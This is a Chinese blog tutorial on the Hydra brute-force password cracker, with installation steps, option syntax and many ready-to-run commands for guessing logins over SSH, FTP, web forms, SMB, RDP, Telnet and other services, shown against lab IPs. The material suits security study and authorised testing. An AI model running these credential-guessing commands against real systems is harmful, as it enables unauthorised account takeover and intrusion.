zoukankan      html  css  js  c++  java
  • 暴力密码在线破解工具

    一,简介

    hydra是著名的***组织thc的一种嵌入式的暴力密码破解工具,可以在线破解多个密码。官网:http //www.thc.org/thc-hydra

    可支持AFP,Cisco AAA,Cisco auth,Cisco enable,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP- PROXYHTTPS -FORM-GET,HTTPS -FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP代理,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle 侦听器,Oracle SID,Oracle,PC-Anywhere,PCNFS,POP3 ,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP枚举,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware -Auth,VNC和XMPP等类型密码。

    海德拉是一只具有九个头的怪蛇,他是希腊神话中最强悍的怪物之父百首巨龙堤丰(typhon)和女首蛇身怪爱克特娜(echidina)**所生下来的,又有一种说法是帕拉思phallas和冥河(日verstynx)结合而生的,他生活在阿苟思海湾的罗娜地方的沼泽中,被称为罗那九头蛇,他吞食田地,蹂躏人畜,无恶不作,他所吐出来的毒气还使得当地成为所谓的瘟疫沼泽 [1]  。
    宙斯所生的赫克力士(hercules)因为天后赫拉的陷害而丧失神智,杀了自己的妻儿,为了要赎罪,他接受神谕,前往服侍他的表亲迈西尼国王尤理士修士,尤理士并不笨,他为了取悦赫拉,于是决定尽一切可能害死赫克力士,于是他交给了他十二个难如登天的任务,第一个是杀掉刀枪不入的奈米亚之狮,后来赫克力士将它的皮当做护甲去进行第二个任务,这第二个任务就是宰杀九头蛇海德拉,这个九头蛇厉害的地方除了它的毒气之外,它的毒液也是世间奇毒。
    不过由于赫克力是身上的狮皮刀枪不入,所以它的毒牙也没有办法进去,不过它有九个头,砍掉每一个头都会再生,而且中间的那一个头还是永生不死的,让赫克力士大伤脑筋,还好后来他的侄子交给他一个火把,让他每砍掉一个头就用火把烧伤口,让他再也长不出头来。而最后一个头在砍下之后,赫克力士就把它的头用大石头压着,让它再也不能作怪,最后还把身上所有的箭都沾上了海德拉的毒血,成为赫克力士后来最致命的武器。

    二、安装            ---http://www.thc.org/thc-hydra

    1、安装相关依赖包

    • Ubuntu/Debian
    apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra

      Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装。

    • Redhat/Fedora
    yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
    • OpenSuSE
    zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel

    本实验用的是 CentOS release 5.6 (Final),执行yum install 后相关依赖包安装情况如下:

    2、Hydra 安装

    # wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
    # tar zxvf hydra-7.4.1.tar.gz
    # cd hydra-7.4.1
    # ./configure 
    # make && make install

    # ./configure 会检测当前系统一些组件配置,主要是对于破解支持模块的检测,可根据需要安装对应的支持库和依赖包。

    # make

    # make install

    三、Syntax

    # hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
    [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
    server service [OPT]

    -R
    继续从上一次进度接着破解

    -S
    大写,采用SSL链接

    -s <PORT>
    小写,可通过这个参数指定非默认端口

    -l <LOGIN>
    指定破解的用户,对特定用户破解

    -L <FILE>
    指定用户名字典

    -p <PASS>
    小写,指定密码破解,少用,一般是采用密码字典

    -P <FILE>
    大写,指定密码字典

    -e <ns>
    可选选项,n:空密码试探,s:使用指定用户和密码试探

    -C <FILE>
    使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

    -M <FILE>
    指定目标列表文件一行一条

    -o <FILE>
    指定结果输出文件

    -f
    在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

    -t <TASKS>
    同时运行的线程数,默认为16

    -w <TIME>
    设置最大超时的时间,单位秒,默认是30s

    -v / -V
    显示详细过程

    server
    目标ip

    service
    指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

    OPT
    可选项

    四、实例

    1、手动创建用户名字典和密码字典,这里只是为了演示,只加了几个用户名和弱口令。真正破解时,需要利用密码字典生成器生成强大的字典。 

    2、破解ssh:

    # hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh

    破解成功,直接显示结果。

    也可以使用 -o 选项指定结果输出文件。

    # hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

    五、其他类型密码破解

    • 破解ftp:
    # hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
    # hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
    • get方式提交,破解web登录:
      # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
      # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
    • post方式提交,破解web登录:

      该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

    <form action="index.php" method="POST">
    <input type="text" name="name" /><BR><br>
    <input type="password" name="pwd" /><br><br>
    <input type="submit" name="sub" value="提交">
    </form>

      假设有以上一个密码登录表单,我们执行命令:

    # hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

      说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

      后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

    • 破解https:
    # hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
    • 破解teamspeak:
    # hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
    • 破解cisco:
    # hydra -P pass.txt 10.36.16.18 cisco
    # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
    • 破解smb:
    # hydra -l administrator -P pass.txt 10.36.16.18 smb
    • 破解pop3:
    # hydra -l muts -P pass.txt my.pop3.mail pop3
    • 破解rdp:
    # hydra ip rdp -l administrator -P pass.txt -V
    • 破解http-proxy:
    # hydra -l admin -P pass.txt http-proxy://10.36.16.18
    • 破解imap:
    # hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
    # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
    • 破解telnet
    # hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

    六、总结

    此工具强大之处远多于以上测试,其密码能否破解关键在于强大的字典,对于社工型渗透来说,有时能够得到事半功倍的效果。

  • 相关阅读:
    数据库基础知识复习-2013.09.24
    2013.9.24 答题
    使用单向循环链表实现约瑟夫问题
    C++关于数字逆序输出的两种思路,及字符串逆序输出
    题目要求:建立一个类Str,将一个正整数转换成相应的字符串,例如整数3456转换为字符串"3456".
    将博客搬至CSDN
    Android 下载模块分析(DownloadManager和DownloadProvider)
    linux shell基础语法
    Android过滤Logcat输出
    (Java 多线程系列)Java 线程池(Executor)
  • 原文地址:https://www.cnblogs.com/linyu51/p/14187495.html
Copyright © 2011-2022 走看看